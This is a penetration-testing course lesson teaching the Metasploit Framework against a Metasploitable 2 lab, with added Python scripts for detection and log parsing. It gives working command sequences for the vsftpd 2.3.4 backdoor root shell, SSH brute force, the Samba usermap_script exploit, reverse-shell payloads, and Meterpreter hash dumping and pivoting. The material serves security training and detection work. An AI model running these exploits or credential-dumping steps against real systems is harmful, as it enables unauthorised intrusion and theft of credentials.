DAY 21 OF 100
PHASE 3: CORE ATTACKS


🟣 Day 21 — Metasploit Framework
Day 100 — Professional Pentester

🟣 PHASE 3 BEGINS — CORE ATTACK TECHNIQUES (DAYS 21–35)

Phase 2 gave you the web application layer. Phase 3 adds the infrastructure exploitation layer — Metasploit, network exploitation, post-exploitation, privilege escalation, pivoting, and Active Directory attacks. The tools and techniques professionals use when web vulnerabilities lead to deeper access.

⚖️ Authorised use only: All Metasploit demonstrations use Metasploitable 2 in your isolated lab. Using Metasploit against systems you don’t own or have explicit written permission to test is illegal under computer crime laws globally. The tool’s power is precisely why authorisation documentation is non-negotiable — every professional engagement starts with written scope before any Metasploit module runs.


Everything you’ve learned in the first 20 days was building to this moment. You understand networks. You understand web vulnerabilities. You understand the methodology. Now you get the tool that professional penetration testers use on virtually every infrastructure engagement — a framework containing over 2,400 exploits, integrated payloads, and a post-exploitation platform that turns a single vulnerable service into comprehensive server access.

Metasploit is not a magic button. Students who learn it before understanding the underlying concepts treat it as a black box. You’re different — you’ve spent 20 days building the foundation. Today Metasploit makes sense not just as a set of commands, but as a system whose design reflects exactly the attack concepts you’ve already internalised.

The Metasploit Framework was created by H.D. Moore in 2003 and acquired by Rapid7 in 2009. The Community and open-source versions remain free and are pre-installed on Kali Linux. Metasploit Pro (commercial) adds automation and reporting. For this course — and for most professional testing purposes — the open-source version is entirely sufficient.


Metasploit Architecture — Understanding What You’re Working With

Before touching the console, understand the structure. Metasploit is a modular framework — every capability is a module of a specific type. Knowing the module types tells you exactly where to look when you need a particular capability.

EXPLOIT
Takes advantage of a vulnerability. Requires a payload. Examples: MS17-010 (EternalBlue), vsftpd 2.3.4 backdoor.

AUXILIARY
Supporting tasks — scanners, fuzzers, brute forcers, sniffers. No payload required. Examples: port scanners, service version detectors.

PAYLOAD
What executes on the target after exploitation. Reverse shell, bind shell, Meterpreter, command execution, file operations.

POST
Post-exploitation modules — privilege escalation, credential dumping, lateral movement. Run after a Meterpreter session is established.

ENCODER
Transforms payloads to evade detection. Obfuscates the payload bytes. Shikata Ga Nai (x86) is the classic example.

NOP / EVASION
NOP sleds for buffer overflow exploits. Evasion modules generate AV-evasive executable payloads. Advanced use cases.


msfconsole — Navigation & Core Commands

msfconsole is the primary interface for the Metasploit Framework. It’s a command-line console with its own set of commands and tab-completion. Launch it from any Kali terminal and you’ll see the banner and the msf6 > prompt. Everything in Metasploit flows through this interface.

msfconsole — launching and essential navigation commands
# Launch Metasploit
msfconsole
# Or with database support enabled
msfdb init && msfconsole
# ── Core navigation commands ────────────────────────────────
help # Show all available commands
search vsftpd # Search modules by keyword
use 0 # Select module by index number from search results
use exploit/unix/ftp/vsftpd_234_backdoor # Select by full path
info # Show full module info (description, refs, options)
options # Show required and optional module options
show payloads # List compatible payloads for current exploit
set RHOSTS 192.168.56.101 # Set target IP
set LHOST 192.168.56.100 # Set your Kali IP (for reverse shells)
set LPORT 4444 # Set listener port
run # Execute the module (also: exploit)
back # Deselect current module, return to msf6 >
sessions # List all active sessions
sessions -i 1 # Interact with session 1
exit # Exit msfconsole
# ── Global options (set once, apply to all modules) ─────────
setg RHOSTS 192.168.56.101 # Global set (persists across modules)
setg LHOST 192.168.56.100
unsetg RHOSTS # Remove global setting
save # Save global settings to disk

💡 Tab completion is your best friend: msfconsole has full tab completion for module paths, option names, and commands. Type use exploit/ and press Tab twice to browse exploit categories. Type set R and press Tab to see all options starting with R. Never type full module paths from memory — tab-complete them.

The Core Workflow — Search → Use → Options → Set → Run

Every Metasploit engagement follows the same five-step pattern regardless of the target or vulnerability. Master this workflow and you’ll be comfortable with any module in the framework.

The five-step Metasploit workflow — annotated
# ── STEP 1: SEARCH ──────────────────────────────────────────
msf6 > search type:exploit name:vsftpd
Matching Modules
================
   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     vsFTPd v2.3.4 Backdoor Command Execution
# Search operators
search type:exploit platform:linux rank:excellent
search cve:2017-0144 # EternalBlue by CVE
search name:samba # All Samba modules
# ── STEP 2: USE ─────────────────────────────────────────────
msf6 > use 0
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
# Prompt changes — you’re now inside the module context
# ── STEP 3: OPTIONS ─────────────────────────────────────────
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       Target IP
   RPORT   21               yes       Target port (default 21)
# Required fields with no value must be set before running
# ── STEP 4: SET ─────────────────────────────────────────────
set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
# ── STEP 5: RUN ─────────────────────────────────────────────
run
[*] 192.168.56.101:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.56.101:21 - USER: 331 Please specify the password.
[+] 192.168.56.101:21 - Backdoor service has been spawned, handling...
[+] 192.168.56.101:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened


Auxiliary Modules — Scanning, Brute Force & Intelligence

Auxiliary modules are the reconnaissance and support layer of Metasploit. Before exploiting anything, you use auxiliaries to confirm service versions, brute force credentials, and gather the intelligence that informs which exploit to use. They follow the same search/use/options/run workflow — just without a payload.

Auxiliary modules — most useful examples for Metasploitable 2
# ── Port and service scanner ────────────────────────────────
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.56.101
set PORTS 1-1024
run
# ── SMB version scanner ─────────────────────────────────────
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.56.101
run
[*] 192.168.56.101:445 - Host is running Unix Samba 3.0.20-Debian
# → Samba 3.0.20 → search for Samba exploits next
# ── SSH brute force ─────────────────────────────────────────
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.56.101
set USERNAME msfadmin
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
set VERBOSE false
run
[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin)...'
# ── HTTP version detection ──────────────────────────────────
use auxiliary/scanner/http/http_version
set RHOSTS 192.168.56.101
run
[*] 192.168.56.101:80 Apache/2.2.8 (Ubuntu) DAV/2
# ── FTP anonymous login check ───────────────────────────────
use auxiliary/scanner/ftp/anonymous
set RHOSTS 192.168.56.101
run


Your First Real Exploit — vsftpd 2.3.4 Backdoor on Metasploitable 2

The vsftpd 2.3.4 backdoor is one of the most famous vulnerabilities in penetration testing history: in 2011 a malicious backdoor was inserted into the vsftpd 2.3.4 source code. When a client sends a username containing the smiley sequence :) the backdoored build opens a command shell listening on TCP port 6200. Metasploitable 2 ships with this deliberately vulnerable version for exactly this kind of practice.

vsftpd 2.3.4 exploitation — full walkthrough on Metasploitable 2
# Step 1: Confirm vsftpd version via auxiliary module
msf6 > use auxiliary/scanner/ftp/ftp_version
msf6 > set RHOSTS 192.168.56.101
msf6 > run
[*] 192.168.56.101:21 - FTP Banner: '220 (vsFTPd 2.3.4)\r\n'
# Confirmed: vsFTPd 2.3.4 — backdoored version
# Step 2: Find and load the exploit
msf6 > search vsftpd 2.3.4
msf6 > use 0
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
# Step 3: Review options and info
info
# Note: This module triggers the backdoor that was planted
# in vsftpd 2.3.4 — sends :) in the USER field, opens port 6200
# Step 4: Set target and run
set RHOSTS 192.168.56.101
run
[*] 192.168.56.101:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.56.101:21 - USER: 331 Please specify the password.
[+] 192.168.56.101:21 - Backdoor service has been spawned, handling...
[+] 192.168.56.101:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.56.100:41234 -> 192.168.56.101:6200)
# Step 5: In the shell — you have root!
id
uid=0(root) gid=0(root)
hostname
metasploitable
cat /etc/shadow | head -5
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
# You have root access — can read shadow file (password hashes)

🎯 What just happened: In six commands you went from “target IP” to “root shell on a remote system.” The vulnerability did all the work — Metasploit simply automated the trigger. This is why Metasploitable 2 exists as a training target: to let you practice this workflow safely before applying it in authorised real-world assessments.
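The defender's side of the same walkthrough, as an added example that is not part of the course page or of Metasploit: the backdoor leaves two observable signals, a USER value containing :) on the FTP control channel and a new connection to tcp/6200 from the same client, and the script below picks both out of logs and correlates them. All log data is constructed: the FTP lines imitate vsftpd's log_ftp_protocol output (format assumed), and CONN_LOG is a constructed firewall-style connection feed. The banner check at the end is the inventory side of the same finding, matching the ftp_version output shown above.

```python
"""Detection logic for the vsftpd 2.3.4 backdoor over constructed log lines.

Added example for defenders; not from the course page or the Metasploit project.
FTP_LOG imitates vsftpd's `log_ftp_protocol=YES` format (format assumed);
CONN_LOG is a constructed (timestamp, src, dst, dst_port) connection feed.
"""
import re
from typing import Dict, List, Tuple

BACKDOOR_PORT = 6200  # port the backdoored vsftpd 2.3.4 listens on once triggered

# Constructed vsftpd-style control-channel log (not real server output).
FTP_LOG = """\
Tue Jul  5 12:00:00 2011 [pid 1201] CONNECT: Client "192.168.56.50"
Tue Jul  5 12:00:01 2011 [pid 1201] FTP command: Client "192.168.56.50", "USER anonymous"
Tue Jul  5 12:00:01 2011 [pid 1201] FTP response: Client "192.168.56.50", "331 Please specify the password."
Tue Jul  5 12:00:02 2011 [pid 1201] FTP command: Client "192.168.56.50", "PASS <password>"
Tue Jul  5 12:03:10 2011 [pid 1340] CONNECT: Client "192.168.56.100"
Tue Jul  5 12:03:10 2011 [pid 1340] FTP command: Client "192.168.56.100", "USER Mhpx:)"
Tue Jul  5 12:03:10 2011 [pid 1340] FTP response: Client "192.168.56.100", "331 Please specify the password."
"""

# Constructed connection records: (timestamp, src_ip, dst_ip, dst_port).
CONN_LOG: List[Tuple[str, str, str, int]] = [
    ("2011-07-05T12:00:00", "192.168.56.50", "192.168.56.101", 21),
    ("2011-07-05T12:03:10", "192.168.56.100", "192.168.56.101", 21),
    ("2011-07-05T12:03:11", "192.168.56.100", "192.168.56.101", 6200),
]

USER_CMD = re.compile(r'FTP command: Client "(?P<client>[^"]+)", "USER (?P<user>[^"]*)"')
VSFTPD_BANNER = re.compile(r"\(vsFTPd (\d+(?:\.\d+)*)\)")


def find_trigger_attempts(ftp_log: str) -> List[Dict[str, str]]:
    """Every USER command whose value carries the :) trigger sequence."""
    hits = []
    for line in ftp_log.splitlines():
        m = USER_CMD.search(line)
        if m and ":)" in m.group("user"):
            hits.append({"client": m.group("client"), "user": m.group("user"), "line": line})
    return hits


def find_backdoor_connections(conn_log, dst_port: int = BACKDOOR_PORT):
    """Connections to the backdoor listener port; unusual on any FTP host."""
    return [c for c in conn_log if c[3] == dst_port]


def correlate(ftp_log: str, conn_log) -> List[Dict[str, object]]:
    """A tcp/6200 connection from an IP that also sent a :) USER is rated critical;
    a tcp/6200 connection on its own is still high (the trigger may have been missed)."""
    trigger_clients = {h["client"] for h in find_trigger_attempts(ftp_log)}
    alerts = []
    for ts, src, dst, dport in find_backdoor_connections(conn_log):
        severity = "critical" if src in trigger_clients else "high"
        alerts.append({"time": ts, "src": src, "dst": dst, "port": dport, "severity": severity})
    return alerts


def banner_vulnerable(banner: str) -> bool:
    """True when an FTP banner reports exactly the backdoored vsftpd release."""
    m = VSFTPD_BANNER.search(banner)
    return bool(m) and m.group(1) == "2.3.4"


if __name__ == "__main__":
    for hit in find_trigger_attempts(FTP_LOG):
        print("trigger:", hit["client"], repr(hit["user"]))
    for alert in correlate(FTP_LOG, CONN_LOG):
        print("alert:", alert)
    print("banner vulnerable:", banner_vulnerable("220 (vsFTPd 2.3.4)"))
```

The correlation step is what turns two noisy signals into one confident alert: a :) in a username could be a typo, and a connection to 6200 could be a scanner, but the pair from one source IP is the backdoor being used.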

Payloads — What Executes After Exploitation

A payload defines what happens on the target machine after the exploit lands. Choosing the right payload is critical — it determines whether you get a basic shell, a Meterpreter session, or simply execute a single command. Understanding the three payload types is essential.

SINGLES
How it works: Self-contained — entire payload in one block. No stage needed.
✓ Reliable, no callback needed
✗ Larger, limited functionality
Example: shell_bind_tcp

STAGERS
How it works: Small initial payload that creates a connection, then downloads the stage.
✓ Tiny initial size — fits tight spaces
✗ Requires two-stage delivery
Example: windows/meterpreter/reverse_tcp

STAGELESS
How it works: Complete payload delivered at once — includes stager + stage together.
✓ No callback needed, more reliable in filtered networks
✗ Larger payload size
Example: windows/meterpreter_reverse_tcp

Selecting and setting payloads — practical examples
# List compatible payloads for the current exploit
show payloads
# Set a specific payload
set payload cmd/unix/interact # Simple unix shell (for vsftpd)
set payload linux/x86/meterpreter/reverse_tcp # Meterpreter on Linux
set payload windows/meterpreter/reverse_tcp # Meterpreter on Windows
# Reverse vs bind — choosing connection direction
reverse_tcp # Target connects BACK to attacker (bypasses inbound firewall)
bind_tcp # Attacker connects TO target (requires open inbound port)
# Reverse TCP is used in the vast majority of real-world engagements
# Most targets have outbound connectivity but block inbound connections
# Naming convention: platform/arch/type/transport
linux   / x86 / meterpreter / reverse_tcp
windows / x64 / meterpreter / reverse_https
java    /     / meterpreter / reverse_tcp    # no arch component: Java payloads run on the JVM
# Staged vs stageless is visible in the name: type/transport (meterpreter/reverse_tcp) is staged,
# type_transport in one component (meterpreter_reverse_tcp) is stageless
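The naming convention above is regular enough to parse, and doing so makes the staged/stageless and reverse/bind distinctions concrete. The script below is an added example, not code from the course or from Metasploit; the architecture and stage-type sets are assumed subsets of the names the framework uses, enough for the payload names on this page, and the cmd/* handling is an assumption about how command payloads are named (cmd/unix/interact has no arch or transport structure).

```python
"""Decompose Metasploit payload names using the platform/arch/type/transport
convention. Added example, not part of the course page or of Metasploit.
KNOWN_ARCHES and STAGE_TYPES are assumed subsets of the framework's names."""
from dataclasses import dataclass
from typing import Optional

# Assumed subset of architecture tokens that appear as the second path component.
KNOWN_ARCHES = {"x86", "x64", "aarch64", "armle", "mipsbe", "mipsle"}
# Assumed subset of stage types; staged names split them from the transport with '/',
# stageless/single names join them with '_'.
STAGE_TYPES = {"meterpreter", "shell", "vncinject"}


@dataclass
class PayloadName:
    platform: str
    arch: Optional[str]
    ptype: str
    transport: Optional[str]
    staged: bool

    @property
    def direction(self) -> str:
        """reverse = target calls back to the listener; bind = listener opens on the target."""
        if self.transport is None:
            return "none"
        if self.transport.startswith("reverse"):
            return "reverse"
        if self.transport.startswith("bind"):
            return "bind"
        return "none"


def parse_payload(name: str) -> PayloadName:
    parts = name.strip("/").split("/")
    platform = parts[0]

    # cmd/* payloads (e.g. cmd/unix/interact) are interpreter commands, not staged binaries.
    if platform == "cmd":
        return PayloadName(platform, None, "cmd", parts[-1], staged=False)

    rest = parts[1:]
    arch = None
    if rest and rest[0] in KNOWN_ARCHES:
        arch, rest = rest[0], rest[1:]

    if len(rest) == 2:
        # type and transport are separate components -> staged (stager + stage)
        return PayloadName(platform, arch, rest[0], rest[1], staged=True)

    if len(rest) == 1:
        token = rest[0]
        for ptype in STAGE_TYPES:
            if token.startswith(ptype + "_"):
                # type_transport in one component -> single / stageless
                return PayloadName(platform, arch, ptype, token[len(ptype) + 1:], staged=False)
        return PayloadName(platform, arch, token, None, staged=False)

    raise ValueError(f"unrecognised payload name: {name!r}")


def describe(name: str) -> str:
    p = parse_payload(name)
    kind = "staged" if p.staged else "single/stageless"
    return (f"{name}: platform={p.platform} arch={p.arch or '-'} type={p.ptype} "
            f"transport={p.transport} ({kind}, {p.direction})")


if __name__ == "__main__":
    for n in ["linux/x86/meterpreter/reverse_tcp", "windows/x64/meterpreter/reverse_https",
              "windows/meterpreter_reverse_tcp", "java/meterpreter/reverse_tcp",
              "linux/x86/shell_bind_tcp", "cmd/unix/interact"]:
        print(describe(n))
```

The useful part is the separator rule: a payload whose type and transport are separate path components needs the second-stage download the table above describes, while the underscore form is delivered whole.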


Meterpreter — Post-Exploitation Powerhouse

Meterpreter is the most capable payload in Metasploit. Unlike a raw shell (which gives you a basic command prompt), Meterpreter runs entirely in memory, uses an encrypted channel, and provides a rich command set for post-exploitation. Once you have a Meterpreter session, you have a full toolkit running silently on the target.

Meterpreter — essential commands and capabilities
# ── System information ──────────────────────────────────────
sysinfo # OS, hostname, architecture, language
getuid # Current user (who are you?)
getpid # Process ID of Meterpreter
ps # List all running processes
ifconfig # Network interfaces (same as ipconfig on Windows)
arp # ARP table — reveals other hosts on network
route # Routing table — see internal network routes
# ── File system navigation ──────────────────────────────────
pwd # Current directory
ls # List files
cd /tmp # Change directory
download /etc/shadow /tmp/shadow.txt # Download file to Kali
upload /tmp/tool.sh /tmp/tool.sh # Upload file to target
search -f *.conf -d /etc # Search for config files
cat /etc/passwd # Read file contents
edit /etc/hosts # Edit file in vi
# ── Privilege escalation ────────────────────────────────────
getuid # Check current privilege level
getsystem # Attempt automatic privilege escalation (Windows)
run post/multi/recon/local_exploit_suggester # Suggest local exploits
# ── Credential harvesting ───────────────────────────────────
run post/linux/gather/hashdump # Dump /etc/shadow (Linux)
hashdump # Dump SAM hashes (Windows)
run post/windows/gather/credentials/credential_collector
# ── Shell and pivoting ──────────────────────────────────────
shell # Drop into native OS shell
Ctrl+Z # Background shell, return to Meterpreter
background # Background Meterpreter session
run autoroute -s 10.10.10.0/24 # Add route for pivoting
portfwd add -l 3389 -p 3389 -r 10.10.10.50 # Port forward through target


Session Management — Working with Multiple Shells

On a real engagement you’ll often have multiple active sessions — several exploited machines, multiple shell types, different privilege levels. Metasploit’s session management keeps them organised and lets you switch between them without losing any.

Session management — commands you’ll use on every engagement
# View all active sessions
sessions
Active sessions
===============
  Id  Name  Type                   Info                    Connection
  --  ----  ----                   ----                    ----------
  1         shell unix             uid=0(root) gid=0(r...  192.168.56.100:4444 -> 192.168.56.101:6200
  2         meterpreter x86/linux  msfadmin @ metaspl...   192.168.56.100:4445 -> 192.168.56.101:45678
# Interact with a specific session
sessions -i 1 # Interact with session 1
sessions -i 2 # Interact with session 2
# Background a session (from within the session)
background # Returns to msf6 > prompt, session stays alive
Ctrl+Z # Same — background the current session
# Upgrade a shell session to Meterpreter
sessions -u 1 # Upgrade session 1 to Meterpreter
# Kill a session
sessions -k 1 # Kill session 1
sessions -K # Kill ALL sessions
# Run a module against an existing session
use post/linux/gather/hashdump
set SESSION 1
run


msfdb & Workspaces — Saving Your Work

Metasploit integrates with a PostgreSQL database to store all your scan results, discovered hosts, services, credentials, and notes. On a real engagement with dozens of hosts, this database becomes essential. Workspaces let you separate data from different engagements.

msfdb and workspace management
# Start/enable the database (one-time setup)
sudo msfdb init
msfconsole
db_status
[*] Connected to msf. Connection type: postgresql.
# Workspace management — separate engagements
workspace # List workspaces (* = current)
workspace -a metasploitable # Create new workspace
workspace metasploitable # Switch to workspace
# Import Nmap results directly into database
# First: run Nmap with XML output
nmap -sV -oX /tmp/scan.xml 192.168.56.101
# In msfconsole:
db_import /tmp/scan.xml
[*] Importing 'Nmap XML' data
[*] Import complete
# View discovered hosts and services
hosts # All discovered hosts
services # All discovered services
services -p 21 # Filter by port
creds # Captured credentials
notes # Your notes
vulns # Known vulnerabilities
# Run db_nmap directly from msfconsole
db_nmap -sV --open 192.168.56.101
# Results automatically saved to database
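What db_import actually does with an Nmap XML file is straightforward to reproduce, and doing so shows what ends up in the hosts and services tables and what is left out. The script below is an added example, not code from the course or from Metasploit; the XML is a constructed sample modelled on Nmap -sV -oX output for the Metasploitable 2 services shown on this page, not a real scan result.

```python
"""Parse Nmap -oX output into host/service records, the way db_import feeds the
hosts and services tables before `services -p 21` can filter them.

Added example, not the course's or Metasploit's code. SAMPLE_NMAP_XML is
constructed to resemble a real -sV scan of the services shown on this page."""
import xml.etree.ElementTree as ET
from typing import List

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX /tmp/scan.xml 192.168.56.101">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.56.101" addrtype="ipv4"/>
    <hostnames><hostname name="metasploitable" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open" reason="syn-ack"/>
        <service name="ftp" product="vsftpd" version="2.3.4" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="4.7p1 Debian 8ubuntu1" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.2.8" extrainfo="(Ubuntu) DAV/2" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="open" reason="syn-ack"/>
        <service name="netbios-ssn" product="Samba smbd" version="3.0.20-Debian" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="8180">
        <state state="closed" reason="reset"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text: str) -> List[dict]:
    """One record per open port on each host that is up:
    host, hostname, port, proto, name, product, version."""
    root = ET.fromstring(xml_text)
    records = []
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']")
        ip = addr.get("addr") if addr is not None else ""
        hn = host.find("hostnames/hostname")
        hostname = hn.get("name") if hn is not None else ""
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports never reach the services table
            svc = port.find("service")
            get = (lambda k: svc.get(k, "")) if svc is not None else (lambda k: "")
            records.append({
                "host": ip,
                "hostname": hostname,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "name": get("name"),
                "product": get("product"),
                "version": get("version"),
            })
    return records


def services_on_port(records: List[dict], port: int) -> List[dict]:
    """Equivalent of `services -p <port>`."""
    return [r for r in records if r["port"] == port]


def open_port_count(records: List[dict], host: str) -> int:
    return sum(1 for r in records if r["host"] == host)


if __name__ == "__main__":
    recs = parse_nmap_xml(SAMPLE_NMAP_XML)
    for r in recs:
        print(f"{r['host']:16} {r['port']:>5}/{r['proto']}  {r['name']:12} {r['product']} {r['version']}")
    print("open services:", open_port_count(recs, "192.168.56.101"))
```

Note that the closed 8180/tcp port is dropped at import time: the services table is a record of what was reachable, which is why a db_nmap run without -sV leaves the product and version columns empty and the search step with nothing to go on.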


🎯 Day 21 Practical Task

📋 DAY 21 CHECKLIST — Metasploitable 2 Lab Only
1. Initialise msfdb and create a workspace for today’s lab
sudo msfdb init
msfconsole
workspace -a day21_lab
db_nmap -sV --open 192.168.56.101
hosts
services
How many open services does Metasploitable 2 expose? What do the service versions tell you about potential vulnerabilities?

2. Exploit vsftpd 2.3.4 and get a root shell
Follow the walkthrough above. Once in the root shell: run id, uname -a, and cat /etc/shadow | head -3. Screenshot the root shell — it’s your first real Metasploit exploitation proof.

3. Run three auxiliary modules against Metasploitable 2
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/ftp/anonymous
use auxiliary/scanner/ssh/ssh_login
What does each module reveal? Which of those findings could you use as an exploitation path? Document findings in your msfdb notes.

4. Find and exploit a second vulnerability on Metasploitable 2
Use the SMB version info to search for a Samba exploit: search samba 3.0.20. Find the “usermap_script” module. Run it against the target. Do you get a shell? What user are you running as? Compare the impact to the vsftpd exploit. Share your second shell with #Day21Done 🎯

⭐ BONUS CHALLENGE — Get a Meterpreter Session

After getting a basic shell from vsftpd or Samba, upgrade it to Meterpreter with sessions -u [id]. Once in the Meterpreter session, run sysinfo, download /etc/shadow to your Kali machine, and use run post/linux/gather/hashdump. How many password hashes can you collect? Which of those hashes might crack with Hashcat (Day 10)? Document the full chain: exploit → shell → Meterpreter → hashdump → crack.

🎯 You’ve exploited your first remote service.
Root shell, Meterpreter — the framework makes sense.

Day 22 goes deeper — exploitation techniques beyond Metasploit: manual exploit execution, understanding shellcode, working with public exploits from ExploitDB, and building the attacker instinct for when to use a framework and when to go manual. The techniques that take you from “script runner” to “security engineer.”


Frequently Asked Questions — Day 21

What is the difference between Metasploit Community and Metasploit Pro?
Metasploit Community (free, open-source) includes msfconsole, all exploit and auxiliary modules, Meterpreter, and the database. It’s everything needed for manual penetration testing and covers 95% of professional use cases. Metasploit Pro (commercial, ~$15,000/year) adds a web-based GUI, automated exploitation and discovery, reporting templates, phishing campaign management, MetaModules for automated tasks, and task scheduling. For learning and most professional assessments, Community is entirely sufficient.
Why does Metasploit use a module ranking system?
Module ranks indicate reliability from Excellent to Manual. Excellent means the exploit won’t crash the target and almost always works. Great means it works reliably with some environmental dependencies. Good means average reliability. Normal means some configurations work. Average and Low indicate unreliable exploits. Manual means it requires direct interaction. When choosing between modules, prefer higher-ranked ones — especially in production environments where crashing the target would be a significant problem. Always run info to read the full reliability notes before executing any exploit.
Why does Meterpreter run in memory?
Meterpreter runs entirely in memory — it never writes itself to disk, which makes it significantly harder to detect by antivirus software (which primarily scans files) and leaves minimal forensic evidence. It is injected directly into the exploited process rather than creating a new executable on disk. Communication uses an encrypted channel, making network traffic analysis more difficult. This memory-resident, in-process architecture is why Meterpreter is the preferred payload for real professional engagements where stealth matters.
How do I keep Metasploit updated?
On Kali Linux, run sudo apt update && sudo apt install metasploit-framework to update to the latest package version. Alternatively, msfupdate updates just Metasploit. New exploit modules are added regularly — particularly after major CVE disclosures. Keeping Metasploit updated is important because outdated versions may lack modules for recent vulnerabilities. In professional engagements, document the Metasploit version used in your methodology section.

Mr Elite
Founder, SecurityElites.com | Penetration Tester | Educator

I remember the first time I got a root shell through Metasploit on a real engagement — the vsftpd module, exactly like today’s walkthrough, on a forgotten internal server running a decade-old Linux distro. Six commands from “what’s on this network” to “I’m root.” What made it meaningful wasn’t the tool — it was understanding exactly why it worked. That understanding is what you bring from Days 1–20 into every Metasploit session from here forward.
